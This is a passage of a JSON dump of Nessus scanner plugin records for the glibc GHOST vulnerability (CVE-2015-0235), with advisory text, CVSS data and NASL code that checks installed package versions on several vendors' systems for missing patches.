(CVE-2015-0235)\n\nThe updated packages have been patched to correct this issue.", "cvss3": {"score": null, "vector": null}, "published": "2015-02-11T00:00:00", "type": "nessus", "title": "Mandriva Linux Security Advisory : glibc (MDVSA-2015:039)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-0235"], "modified": "2021-01-06T00:00:00", "cpe": ["p-cpe:/a:mandriva:linux:glibc", "p-cpe:/a:mandriva:linux:glibc-devel", "p-cpe:/a:mandriva:linux:glibc-doc", "p-cpe:/a:mandriva:linux:glibc-doc-pdf", "p-cpe:/a:mandriva:linux:glibc-i18ndata", "p-cpe:/a:mandriva:linux:glibc-profile", "p-cpe:/a:mandriva:linux:glibc-static-devel", "p-cpe:/a:mandriva:linux:glibc-utils", "p-cpe:/a:mandriva:linux:nscd", "cpe:/o:mandriva:business_server:1"], "id": "MANDRIVA_MDVSA-2015-039.NASL", "href": "https://www.tenable.com/plugins/nessus/81280", "sourceData": "#%NASL_MIN_LEVEL 70300\n\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Mandriva Linux Security Advisory MDVSA-2015:039. \n# The text itself is copyright (C) Mandriva S.A.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(81280);\n script_version(\"1.15\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2015-0235\");\n script_bugtraq_id(72325);\n script_xref(name:\"MDVSA\", value:\"2015:039\");\n\n script_name(english:\"Mandriva Linux Security Advisory : glibc (MDVSA-2015:039)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Mandriva Linux host is missing one or more security\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"A vulnerability has been discovered and corrected in glibc :\n\nHeap-based buffer overflow in the __nss_hostname_digits_dots function\nin glibc 2.2, and other 2.x versions before 2.18, allows\ncontext-dependent attackers to execute arbitrary code via vectors\nrelated to the (1) gethostbyname or (2) gethostbyname2 function, aka\nGHOST. (CVE-2015-0235)\n\nThe updated packages have been patched to correct this issue.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/errata/RHSA-2015:0092\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:H/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Exim GHOST (glibc gethostbyname) Buffer Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:glibc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:glibc-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:glibc-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:glibc-doc-pdf\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:glibc-i18ndata\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:glibc-profile\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:glibc-static-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:glibc-utils\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:nscd\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:mandriva:business_server:1\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/02/10\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/02/11\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Mandriva Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/Mandrake/release\", \"Host/Mandrake/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Mandrake/release\")) audit(AUDIT_OS_NOT, \"Mandriva / Mandake Linux\");\nif (!get_kb_item(\"Host/Mandrake/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^(amd64|i[3-6]86|x86_64)$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Mandriva / Mandrake Linux\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"glibc-2.14.1-12.11.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"glibc-devel-2.14.1-12.11.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", reference:\"glibc-doc-2.14.1-12.11.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", reference:\"glibc-doc-pdf-2.14.1-12.11.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"glibc-i18ndata-2.14.1-12.11.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"glibc-profile-2.14.1-12.11.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"glibc-static-devel-2.14.1-12.11.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"glibc-utils-2.14.1-12.11.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"nscd-2.14.1-12.11.mbs1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.6, "vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-09-11T01:41:37", "description": "The remote OracleVM system is missing necessary patches to address critical security updates :\n\n - Fix parsing of numeric hosts in gethostbyname_r (CVE-2015-0235, #1183533).", "cvss3": {"score": null, "vector": null}, "published": "2015-01-30T00:00:00", "type": "nessus", "title": "OracleVM 3.3 : glibc (OVMSA-2015-0022) (GHOST)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-0235"], "modified": "2021-01-04T00:00:00", "cpe": ["p-cpe:/a:oracle:vm:glibc", "p-cpe:/a:oracle:vm:glibc-common", "p-cpe:/a:oracle:vm:nscd", "cpe:/o:oracle:vm_server:3.3"], "id": "ORACLEVM_OVMSA-2015-0022.NASL", "href": "https://www.tenable.com/plugins/nessus/81103", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The package checks in this plugin were extracted from OracleVM\n# Security Advisory OVMSA-2015-0022.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(81103);\n script_version(\"1.17\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/04\");\n\n script_cve_id(\"CVE-2015-0235\");\n script_bugtraq_id(72325);\n\n script_name(english:\"OracleVM 3.3 : glibc (OVMSA-2015-0022) (GHOST)\");\n script_summary(english:\"Checks the RPM output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote OracleVM host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The remote OracleVM system is missing necessary patches to address\ncritical security updates :\n\n - Fix parsing of numeric hosts in gethostbyname_r\n (CVE-2015-0235, #1183533).\"\n );\n # https://oss.oracle.com/pipermail/oraclevm-errata/2015-January/000259.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?73666800\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected glibc / glibc-common / nscd packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:H/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Exim GHOST (glibc gethostbyname) Buffer Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:vm:glibc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:vm:glibc-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:vm:nscd\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:vm_server:3.3\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2015/01/28\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/01/29\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/01/30\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"OracleVM Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/OracleVM/release\", \"Host/OracleVM/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/OracleVM/release\");\nif (isnull(release) || \"OVS\" >!< release) audit(AUDIT_OS_NOT, \"OracleVM\");\nif (! preg(pattern:\"^OVS\" + \"3\\.3\" + \"(\\.[0-9]|$)\", string:release)) audit(AUDIT_OS_NOT, \"OracleVM 3.3\", \"OracleVM \" + release);\nif (!get_kb_item(\"Host/OracleVM/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"OracleVM\", cpu);\nif (\"x86_64\" >!< cpu) audit(AUDIT_ARCH_NOT, \"x86_64\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"OVS3.3\", reference:\"glibc-2.12-1.149.el6_6.5\")) flag++;\nif (rpm_check(release:\"OVS3.3\", reference:\"glibc-common-2.12-1.149.el6_6.5\")) flag++;\nif (rpm_check(release:\"OVS3.3\", reference:\"nscd-2.12-1.149.el6_6.5\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"glibc / glibc-common / nscd\");\n}\n", "cvss": {"score": 7.6, "vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-09-11T01:41:11", "description": "The Cisco Application Control Engine (ACE) software installed on the remote Cisco IOS device is version A2(3.6d) or A5(3.1b). It is, therefore, affected by a heap-based buffer overflow vulnerability in the GNU C Library (glibc) due to improperly validating user-supplied input to the __nss_hostname_digits_dots(), gethostbyname(), and gethostbyname2() functions. This allows a remote attacker to cause a buffer overflow, resulting in a denial of service condition or the execution of arbitrary code.", "cvss3": {"score": null, "vector": null}, "published": "2015-02-20T00:00:00", "type": "nessus", "title": "Cisco Application Control Engine GNU glibc gethostbyname Function Buffer Overflow Vulnerability (cisco-sa-20150128-ghost) (GHOST)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-0235"], "modified": "2019-11-25T00:00:00", "cpe": ["cpe:/a:cisco:application_control_engine_software"], "id": "CISCO-SA-20150128-ACE.NASL", "href": "https://www.tenable.com/plugins/nessus/81423", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(81423);\n script_version(\"1.13\");\n script_cvs_date(\"Date: 2019/11/25\");\n\n script_cve_id(\"CVE-2015-0235\");\n script_bugtraq_id(72325);\n script_xref(name:\"CISCO-BUG-ID\", value:\"CSCus68907\");\n script_xref(name:\"CISCO-BUG-ID\", value:\"CSCus67782\");\n script_xref(name:\"CISCO-SA\", value:\"cisco-sa-20150128-ghost\");\n script_xref(name:\"CERT\", value:\"967332\");\n\n script_name(english:\"Cisco Application Control Engine GNU glibc gethostbyname Function Buffer Overflow Vulnerability (cisco-sa-20150128-ghost) (GHOST)\");\n script_summary(english:\"Checks the ACE version.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote device is affected by a buffer overflow vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The Cisco Application Control Engine (ACE) software installed on the\nremote Cisco IOS device is version A2(3.6d) or A5(3.1b). It is,\ntherefore, affected by a heap-based buffer overflow vulnerability in\nthe GNU C Library (glibc) due to improperly validating user-supplied\ninput to the __nss_hostname_digits_dots(), gethostbyname(), and\ngethostbyname2() functions. This allows a remote attacker to cause a\nbuffer overflow, resulting in a denial of service condition or the\nexecution of arbitrary code.\");\n # https://www.cisco.com/c/en/us/support/docs/csa/cisco-sa-20150128-ghost.html#@ID\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?a2a71f8e\");\n script_set_attribute(attribute:\"see_also\", value:\"https://tools.cisco.com/bugsearch/bug/CSCus68907\");\n script_set_attribute(attribute:\"see_also\", value:\"https://tools.cisco.com/bugsearch/bug/CSCus67782\");\n # https://www.qualys.com/research/security-advisories/GHOST-CVE-2015-0235.txt\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?c7a6ddbd\");\n script_set_attribute(attribute:\"solution\", value:\n\"The vendor has stated that no release is planned to fix this issue.\nContact the vendor for other possible options.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2015-0235\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Exim GHOST (glibc gethostbyname) Buffer Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2015/01/12\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/02/20\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:cisco:application_control_engine_software\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"CISCO\");\n\n script_copyright(english:\"This script is Copyright (C) 2015-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"cisco_ace_version.nasl\");\n script_require_keys(\"Host/Cisco/ACE/Version\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\n\nversion = get_kb_item(\"Host/Cisco/ACE/Version\");\nif (isnull(version)) audit(AUDIT_NOT_INST, 'Cisco ACE');\n\nif (\n version == \"A2(3.6d)\" ||\n version == \"A5(3.1b)\"\n)\n{\n if (report_verbosity > 0)\n {\n report = '\\n Installed version : ' + version +\n '\\n Fixed version : See solution.' +\n '\\n';\n security_hole(port:0, extra:report);\n }\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_INST_VER_NOT_VULN, \"Cisco ACE\", version);\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-09-11T01:41:30", "description": "The remote host is running a version of Palo Alto Networks PAN-OS equal to or prior to 5.0.15 / 6.0.8 / 6.1.2. It is, therefore, affected by a heap-based buffer overflow in the GNU C Library (glibc) due to improperly validating user-supplied input in the glibc functions __nss_hostname_digits_dots(), gethostbyname(), and gethostbyname2(). This allows a remote attacker to cause a buffer overflow, resulting in a denial of service condition or the execution of arbitrary code.", "cvss3": {"score": null, "vector": null}, "published": "2015-02-04T00:00:00", "type": "nessus", "title": "Palo Alto Networks PAN-OS <= 5.0.15 / 6.0.x <= 6.0.8 / 6.1.x <= 6.1.2 GNU C Library (glibc) Buffer Overflow (GHOST)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-0235"], "modified": "2018-07-24T00:00:00", "cpe": ["cpe:/o:paloaltonetworks:pan-os"], "id": "PALO_ALTO_PAN-SA-2015-0002.NASL", "href": "https://www.tenable.com/plugins/nessus/81167", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(81167);\n script_version(\"1.16\");\n script_cvs_date(\"Date: 2018/07/24 18:56:13\");\n\n script_cve_id(\"CVE-2015-0235\");\n script_bugtraq_id(72325);\n script_xref(name:\"CERT\", value:\"967332\");\n\n script_name(english:\"Palo Alto Networks PAN-OS <= 5.0.15 / 6.0.x <= 6.0.8 / 6.1.x <= 6.1.2 GNU C Library (glibc) Buffer Overflow (GHOST)\");\n script_summary(english:\"Checks the PAN-OS version.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\"The remote host is affected by a buffer overflow vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote host is running a version of Palo Alto Networks PAN-OS\nequal to or prior to 5.0.15 / 6.0.8 / 6.1.2. It is, therefore,\naffected by a heap-based buffer overflow in the GNU C Library (glibc)\ndue to improperly validating user-supplied input in the glibc\nfunctions __nss_hostname_digits_dots(), gethostbyname(), and\ngethostbyname2(). This allows a remote attacker to cause a buffer\noverflow, resulting in a denial of service condition or the execution\nof arbitrary code.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://securityadvisories.paloaltonetworks.com/Home/Detail/29\");\n # https://www.qualys.com/research/security-advisories/GHOST-CVE-2015-0235.txt\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?c7a6ddbd\");\n script_set_attribute(attribute:\"solution\", value:\n\"The vendor has not yet provided a patch at this time (2015/03/10).\n\nPlease contact the vendor regarding a patch or workaround.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:H/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Exim GHOST (glibc gethostbyname) Buffer Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2015/01/12\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/02/04\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"combined\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:paloaltonetworks:pan-os\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Palo Alto Local Security Checks\");\n\n script_dependencies(\"palo_alto_version.nbin\");\n script_require_keys(\"Host/Palo_Alto/Firewall/Version\", \"Host/Palo_Alto/Firewall/Full_Version\");\n\n script_copyright(english:\"This script is Copyright (C) 2015-2018 Tenable Network Security, Inc.\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\n\napp_name = \"Palo Alto Networks PAN-OS\";\nversion = get_kb_item_or_exit(\"Host/Palo_Alto/Firewall/Version\");\nfull_version = get_kb_item_or_exit(\"Host/Palo_Alto/Firewall/Full_Version\");\nfix = NULL;\n\n# Ensure sufficient granularity.\nif (\n version =~ \"^5(\\.0)?$\" ||\n version =~ \"^6(\\.[01])?$\"\n) audit(AUDIT_VER_NOT_GRANULAR, app_name, full_version);\n\nif (version =~ \"^6\\.1\\.\")\n cutoff = \"6.1.2\";\nelse if (version =~ \"^6\\.0\\.\")\n cutoff = \"6.0.8\";\nelse if (\n version =~ \"^[0-4]($|[^0-9])\" ||\n version =~ \"^5\\.0\\.\"\n)\n cutoff = \"5.0.15\";\nelse\n audit(AUDIT_NOT_INST, app_name + \" 0.x-4.x / 5.0.x / 6.0.x / 6.1.x\");\n\n# Compare version to fix and report as needed.\nif (ver_compare(ver:version, fix:cutoff, strict:FALSE) <= 0)\n{\n if (report_verbosity > 0)\n {\n report =\n '\\n Installed version : ' + full_version +\n '\\n Fixed versions : See solution.' +\n '\\n';\n security_hole(extra:report, port:0);\n }\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_INST_VER_NOT_VULN, app_name, full_version);\n", "cvss": {"score": 7.6, "vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-09-11T01:41:11", "description": "This update for glibc fixes the following security issue :\n\n - A vulnerability was found and fixed in the GNU C Library, specifically in the function gethostbyname(), that can lead to a local or remote buffer overflow.\n (bsc#913646). (CVE-2015-0235)", "cvss3": {"score": null, "vector": null}, "published": "2015-02-02T00:00:00", "type": "nessus", "title": "SuSE 10 Security Update : glibc (ZYPP Patch Number 9035)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-0235"], "modified": "2021-01-06T00:00:00", "cpe": ["p-cpe:/a:novell:suse_linux:10:glibc", "p-cpe:/a:novell:suse_linux:10:glibc-32bit", "p-cpe:/a:novell:suse_linux:10:glibc-devel", "p-cpe:/a:novell:suse_linux:10:glibc-devel-32bit", "p-cpe:/a:novell:suse_linux:10:glibc-html", "p-cpe:/a:novell:suse_linux:10:glibc-i18ndata", "p-cpe:/a:novell:suse_linux:10:glibc-info", "p-cpe:/a:novell:suse_linux:10:glibc-locale", "p-cpe:/a:novell:suse_linux:10:glibc-locale-32bit", "p-cpe:/a:novell:suse_linux:10:glibc-profile", "p-cpe:/a:novell:suse_linux:10:glibc-profile-32bit", "p-cpe:/a:novell:suse_linux:10:nscd", "cpe:/o:novell:suse_linux:10"], "id": "SUSE_GLIBC-9035.NASL", "href": "https://www.tenable.com/plugins/nessus/81125", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The text description of this plugin is (C) Novell, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(81125);\n script_version(\"1.16\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2015-0235\");\n script_bugtraq_id(72325);\n script_xref(name:\"CERT\", value:\"967332\");\n\n script_name(english:\"SuSE 10 Security Update : glibc (ZYPP Patch Number 9035)\");\n script_summary(english:\"Checks rpm output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SuSE 10 host is missing a security-related patch.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update for glibc fixes the following security issue :\n\n - A vulnerability was found and fixed in the GNU C\n Library, specifically in the function gethostbyname(),\n that can lead to a local or remote buffer overflow.\n (bsc#913646). (CVE-2015-0235)\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=913646\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2015-0235.html\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Apply ZYPP patch number 9035.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:H/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Exim GHOST (glibc gethostbyname) Buffer Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:10:glibc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:10:glibc-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:10:glibc-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:10:glibc-devel-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:10:glibc-html\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:10:glibc-i18ndata\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:10:glibc-info\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:10:glibc-locale\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:10:glibc-locale-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:10:glibc-profile\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:10:glibc-profile-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:10:nscd\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:10\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/01/27\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/02/02\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2021 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^SLES10\") audit(AUDIT_OS_NOT, \"SuSE 10\");\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SuSE 10\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"SLES10\", sp:4, reference:\"glibc-2.4-31.113.3\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:4, reference:\"glibc-devel-2.4-31.113.3\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:4, reference:\"glibc-html-2.4-31.113.3\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:4, reference:\"glibc-i18ndata-2.4-31.113.3\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:4, reference:\"glibc-info-2.4-31.113.3\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:4, reference:\"glibc-locale-2.4-31.113.3\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:4, reference:\"glibc-profile-2.4-31.113.3\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:4, reference:\"nscd-2.4-31.113.3\")) flag++;\nif 